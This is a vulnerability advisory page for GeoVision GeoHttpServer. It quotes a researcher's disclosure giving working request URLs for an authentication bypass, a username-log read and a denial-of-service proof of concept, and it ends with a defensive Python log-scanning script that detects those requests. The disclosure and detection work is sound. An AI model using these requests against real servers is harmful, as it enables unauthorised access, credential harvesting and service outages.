SecurityTracker.com
Category:   Application (Multimedia)  >   GeoHttpServer
Vendors:   GeoVision Inc.
GeoVision GeoHttpServer Authentication Bypass Grants Access to Remote Users
SecurityTracker Alert ID:  1008826
SecurityTracker URL:  http://securitytracker.com/id/1008826
CVE Reference:   GENERIC-MAP-NOMATCH
Updated:  Jan 22 2004
Original Entry Date:  Jan 22 2004
Impact:   User access via network


Description:   Rafel Ivgi (The-Insider) reported a vulnerability in the GeoVision GeoHttpServer. A remote user can bypass the authentication mechanism and access the application's main page.

It is reported that a remote user can supply the following URL to gain access to the main page without having to authenticate:

http://[target]/%0a%0a

A remote user can then retrieve a list of recently used usernames at the following URL:

http://[target]/logfile.txt

Impact:   A remote user can gain access on the application.
Solution:   No solution was available at the time of this entry.
Vendor URL:  www.geovision.com.tw
Cause:   Authentication error
Underlying OS:   Windows (Any)

Message History:   None.


 Source Message Contents

Date:  Thu, 22 Jan 2004 19:23:16 +0200
Subject:  GeoHttpServer Authentification Bypass Vulnerability & D.O.S (Denial Of Service)


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Software:       GeoHttpServer
Vendor:          GEOVISION INC
                        http://www.geovision.com.tw
Versions:        ALL
Platforms:       Unix
Bug:                 Authentication Bypass Vulnerability & D.O.S (Denial Of Service)
Risk:                High
Exploitation:   Remote with browser
Date:               22 Jan 2004
Author:            Rafel Ivgi, The-Insider
e-mail:             the_insider@mail.com
web:                http://theinsider.deep-ice.com

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

1) Introduction
2) Bug
3) The Code

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

===============
1) Introduction
===============

thttpd is a free "Open Source" web server that comes by default with Unix
systems such as FreeBSD and Linux.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

======
2) Bug
======

The GeoHttpServer security is pretty good. Some users who understand what
they are doing configure the server to authenticate login attempts.

The server uses this authentication code:
**********************************************
<html><head><title>Login In</title>
</head><body><center>
<form method="POST" action="phoneinfo">User Name:</BR>
  <input type="id" name="id" size="10"><p></p>
  Password:</BR>
  <input type="password" name="pwd" size="10">
  <p><input type="radio" name="ImageType" value="1" checked>JPEG&nbsp;
  <input type="radio" name="ImageType" value="2">GIF</p>
  <p><input type="submit" name="send" value="Submit"><input type="reset"
name="CANCEL" value="Cancel"></center><center><br>
  </p>
</form>
</center>
</body>
</html>
**********************************************

Amazingly - http://<host>/%0a%0a Bypasses it!
You get the GeoHttpServer default Main Page.

Now the main page leads to functions that also require authentication.
In order to retrieve a user name we can go to http://<host>/logfile.txt,
which generally contains the last logins and usernames.
In most cases the password will be the same as the user.

In addition there is an authentication form inside the server that
requires a name and a password in order to see the server info/config.
Manipulating these links can cause a denial of service of the server.

P.O.C(Proof Of Concept):
http://<GeoHttpServerhost>/sysinfo?id=TheInsider&pwd=killedaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaa

Another D.O.S caused by the server is an Internet Explorer D.O.S: when
someone is watching a video stream from the server and presses the
reconnect button, I.E has an overflow.
Internet Explorer Version: 6.0.2600.0
Module Stuck: msxml3.dll
Module Version: 8.20.9415.0
Offset: 00013ed6

http://theinsider.deep-ice.com/

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

===========
3) The Code
===========

Authentication Bypass - http://<host>/%0a%0a Bypasses it!
Denial Of Service -
http://<GeoHttpServerhost>/sysinfo?id=TheInsider&pwd=killedaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaa

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

---
Rafel Ivgi, The-Insider
http://theinsider.deep-ice.com

"Things that are unlikeable, are NOT impossible."
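
A defender-side check for the three request patterns reported above (the `/%0a%0a` path, the `/logfile.txt` read, and the over-long `sysinfo` credential parameter), as an added example that is not part of the original advisory or message. It assumes access logs in Common Log Format, for instance from a proxy in front of the server; `MAX_CRED_LEN`, the function names and the sample lines are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, unquote, parse_qsl
# Assumed threshold: the advisory states no safe length, so 64 is a placeholder.
MAX_CRED_LEN = 64
# Assumed log format: Common Log Format, client address first, request quoted.
_REQ = re.compile(r'^(?P<client>\S+) .*?"[A-Z]+ (?P<target>\S+) HTTP/[\d.]+"')

def classify(target):
    """Return the names of the advisory's request patterns that target matches."""
    parts = urlsplit(target)
    path = unquote(parts.path)  # %0a, %0A and %0d become raw LF/CR here
    hits = []
    if "\n" in path or "\r" in path:
        hits.append("encoded-newline-path")
    if path.lower() == "/logfile.txt":
        hits.append("logfile-request")
    if path.lower() == "/sysinfo":
        for name, value in parse_qsl(parts.query, keep_blank_values=True):
            if name in ("id", "pwd") and len(value) > MAX_CRED_LEN:
                hits.append("oversized-" + name)
    return hits

def scan(lines):
    """Map each client address to the ordered list of patterns it triggered."""
    by_client = {}
    for line in lines:
        m = _REQ.search(line)
        hits = classify(m.group("target")) if m else []
        if hits:
            by_client.setdefault(m.group("client"), []).extend(hits)
    return by_client

def bypass_then_logfile(by_client):
    """Clients that requested an encoded-newline path and later /logfile.txt."""
    return sorted(c for c, h in by_client.items()
                  if "encoded-newline-path" in h
                  and "logfile-request" in h[h.index("encoded-newline-path"):])

# Constructed sample lines (documentation addresses, not real traffic).
SAMPLE_LOG = [
    '192.0.2.10 - - [22/Jan/2004:19:01:02 +0200] "GET / HTTP/1.0" 200 812',
    '198.51.100.7 - - [22/Jan/2004:19:02:10 +0200] "GET /%0a%0a HTTP/1.0" 200 4096',
    '198.51.100.7 - - [22/Jan/2004:19:02:31 +0200] "GET /logfile.txt HTTP/1.0" 200 1530',
    '198.51.100.7 - - [22/Jan/2004:19:03:05 +0200] "GET /sysinfo?id=x&pwd=' + "a" * 400 + ' HTTP/1.0" 200 0',
    '203.0.113.5 - - [22/Jan/2004:19:05:40 +0200] "GET /logfile.txt HTTP/1.0" 200 1530',
]

if __name__ == "__main__":
    print(scan(SAMPLE_LOG), bypass_then_logfile(scan(SAMPLE_LOG)))
```

A `logfile-request` hit on its own can be routine; the sequence reported by `bypass_then_logfile` is the higher-confidence signal.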

 
 



Copyright 2014, SecurityGlobal.net LLC